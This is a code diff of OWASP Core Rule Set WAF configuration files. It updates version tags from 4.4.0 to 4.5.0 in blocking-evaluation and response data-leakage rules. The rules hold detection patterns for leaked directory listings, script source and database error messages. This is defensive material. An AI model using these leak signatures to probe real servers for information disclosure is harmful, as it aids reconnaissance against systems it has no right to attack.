"id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" + ver:'OWASP_CRS/4.5.0'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 
"id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecMarker "END-REQUEST-949-BLOCKING-EVALUATION" diff --git a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf index ae3bab1..a83b774 100644 --- a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # 
@@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]
)" \ "id:950130,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54/127',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ @@ -52,11 +52,11 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ "id:950100,\ phase:3,\ 
@@ -73,11 +73,11 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'OWASP_CRS',\ tag:'capec/1000/152',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecMarker "END-RESPONSE-950-DATA-LEAKAGES" diff --git a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf index c7b79d2..c08aa34 100644 --- a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ "id:951100,\ phase:4,\ @@ -29,7 +29,7 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ tag:'attack-disclosure',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-SQL-ERROR-MATCH-PL1" SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ "id:951110,\ @@ -46,7 +46,7 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -65,7 +65,7 @@ SecRule RESPONSE_BODY "@rx (?i)\bORA-[0-9][0-9][0-9][0-9][0-9]:|java\.sql\.SQLEx tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -84,7 +84,7 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]| tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -103,7 +103,7 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -122,7 +122,7 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -141,7 +141,7 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -160,7 +160,7 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -179,7 +179,7 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -198,7 +198,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -217,7 +217,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -236,7 +236,7 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -255,7 +255,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -274,7 +274,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.* tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -293,7 +293,7 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -312,7 +312,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/J tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" 
@@ -331,15 +331,15 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" 
"id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" SecMarker "END-RESPONSE-951-DATA-LEAKAGES-SQL" diff --git a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 8911bc5..959b3de 100644 --- a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ "id:952100,\ phase:4,\ 
@@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ 
@@ -52,13 +52,13 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" SecMarker "END-RESPONSE-952-DATA-LEAKAGES-JAVA" diff --git a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf index 2f711e2..118913b 100644 --- a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ "id:953100,\ phase:4,\ 
